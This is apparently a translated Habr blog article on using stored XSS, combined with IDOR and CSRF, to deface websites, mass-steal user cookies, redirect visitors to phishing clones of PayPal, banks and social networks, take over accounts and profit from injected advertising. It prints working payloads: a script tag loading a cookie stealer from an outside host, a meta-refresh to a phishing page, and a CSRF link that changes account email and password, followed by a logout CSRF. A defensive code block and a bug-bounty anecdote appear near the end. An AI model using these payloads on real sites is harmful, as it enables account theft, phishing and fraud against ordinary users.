
Defacing a site using XSS

A site can be defaced if you have FTP access, have uploaded a shell, and so on, but it can also be done with an ordinary XSS. In this article I want to show how to use Stored XSS to change the contents of a site's main page, or of a specific page, in order to steal users' cookies en masse and redirect them to your site.

All information is provided for informational purposes only. I am not responsible for any possible harm caused by the materials of this article.

So, what is a deface (Wikipedia):
Deface (from English deface: to disfigure, distort) is a type of website hacking in which the main (or any other) page of a website is replaced with another one, usually of a provocative kind: an advertisement, a warning, a threat or a joke.
Often access to the rest of the site is blocked, or the former site content is removed entirely.

The main reasons for site deface are:
1. Hooliganism, as self-affirmation for novice hackers.

2. Advertising, often of questionable products or services. Promotional images, links to sites (often infected with viruses), etc. are published on the site.

3. Competition between organizations. One firm inflicts image and reputational damage on a competitor by hacking and defacing its site.

An example from 2012.

Stored XSS on the main page is most often found (in my experience) on sites that display user activity on the main page, mainly:

* user added photo 1.jpg;
* user created a topic / blog post;
* user joined a group;
* user added another user as a friend.

We can embed the script in the username or in the name of the photo / group / topic, create a second test account and add it as a friend, so that the script runs on the main page.

Even to get the code executed by a large number of people, it does not have to be on the main page: it can be embedded in the personal accounts of all users, in the comments on some article, or in an ad created on the site. For example, country.ua (around 3,000th place by traffic in Ukraine) filters the ad title and description, but not the username.



1) Stored XSS in the comments on an article / topic: everything is simple here, we write JS in the comment field, post it, and collect the logs.

2) For the code to be executed for every user in their personal account, you need to use XSS together with IDOR. If, using IDOR, you can change any user's email, reset the account and take it over, that is good; but what if we can only change data whose modification leads nowhere (for example, editing notes, user addresses, etc.)?

In that case we need to find a place in the personal account where the user id can be manipulated in the POST or GET request, change the data, and iterate through all possible ids. What matters is that there is a stored XSS there.

On the main page we can place a cookie-stealing script, a CSRF exploit, or a redirect to a phishing site:

1) Cookie-theft script

"><script src=https://securityz.net/x.js?> 

Once we manage to capture cookies, it is hard to sort through them afterwards, especially since many of them expire soon; it is a plus if the user's email address is recorded in a cookie (then we can load his account) along with the password in md5 (I have seen many websites that store passwords in cookies).

If we do not want to spend time sorting cookies, or many of the cookies are HttpOnly, we can resort to the second option.

2) Redirect to a phishing copy of the vulnerable site, to a link that downloads a backdoor, or to a clone of PayPal / Privat24 / Sberbank / a social network:

 <meta http-equiv="refresh" content="1;URL=https://securityz.net/vk.html" /> 

3) If there is a CSRF in the personal account, we can redirect to a CSRF exploit, for example example.com/account?do=settings&email=support1@habrahabr.ru&city=qwqwqw&address=qwqwwqqw&phone=11111111&password=qwerty&confirm_password=qwerty , or a script that substitutes a digit in the email, and obtain users' logins and passwords; it is reasonable to follow the exploit immediately with a logout CSRF https://example.com?logout so that users cannot get into their account and restore it.

The interesting thing is that if you do not use a redirect but simply load JS on the page and steal cookies, the vulnerability may go unnoticed for a long time.
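The defensive counterpart to the three payloads above and to the IDOR/CSRF chain in the personal-account section, as an added example that is not part of the original article: plain Node.js with no dependencies, where the activity-feed event shape, the session object and the request shape are assumptions and the sample events are constructed from the payload strings quoted in the text.

```javascript
// Added example (not from the original article): server-side controls that
// neutralize the payloads discussed above. Event/session/request shapes are assumed.

// 1. Contextual output encoding: every user-controlled string (username,
//    photo/topic name) is escaped before it is placed in the feed's HTML, so
//    '"><script src=...>' and '<meta http-equiv="refresh" ...>' render as text.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderActivity(events) {
  return events
    .map((e) => `<li><b>${escapeHtml(e.user)}</b> ${escapeHtml(e.action)} ${escapeHtml(e.item)}</li>`)
    .join('\n');
}

// Constructed sample: the two payload strings from the article, stored as a
// username and a topic name exactly as they would have been submitted.
const SAMPLE_EVENTS = [
  { user: '"><script src=https://securityz.net/x.js?>', action: 'added photo', item: '1.jpg' },
  { user: 'bob', action: 'created a topic',
    item: '<meta http-equiv="refresh" content="1;URL=https://securityz.net/vk.html" />' },
];

// 2. Session cookie that page scripts cannot read (HttpOnly) and that is not
//    attached to cross-site top-level navigations caused by a redirect (SameSite).
function sessionCookie(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constant-time string comparison so the token check does not leak via timing.
function safeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// 3. The settings endpoint: reject a user id that is not the session's own
//    (IDOR) and any request lacking the session's CSRF token (which blocks the
//    email/password-change and logout CSRF described above).
function authorizeSettingsUpdate(session, req) {
  if (!session || !req) return 'denied: no session';
  if (String(req.userId) !== String(session.userId)) return 'denied: user id mismatch';
  if (!safeEqual(String(req.csrfToken || ''), session.csrfToken)) return 'denied: bad csrf token';
  return 'ok';
}

console.log(renderActivity(SAMPLE_EVENTS));
```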

We have figured out how to hack users en masse. Now I will explain how to make money on advertising or to push your site to the top by traffic.

1) Instead of redirecting to phishing sites, we can make money from the traffic like a webmaster, simply "slipping" advertising links to users. To serve as much advertising as possible in the time before the vulnerability is fixed, we load ads in iframes or pop-up windows, where they multiply, for example like these scammers who earn $7,000,000 per month on advertising. Many advertisers willing to pay for link clicks can be found on the net (not an ad).

2) Back in 2004 the authors of xakep.ru figured out how to push their site to the top by embedding the mail.ru counter on a site's home page; you can do the same.

Two examples of my defaces from real life:


02/04/2017: Reported the vulnerability.
02/04/2017: The vulnerability was fixed.
02/10/2017: A $200 reward was paid. The impact was proven by showing that this is not an ordinary XSS but a deface.
02/16/2017: An additional reward of $800. Total for this vulnerability: $1000.

Conclusion of the article: in a bug bounty, escalating an XSS to a deface can get you much more money for the vulnerability.


Source: https://habr.com/ru/post/328276/
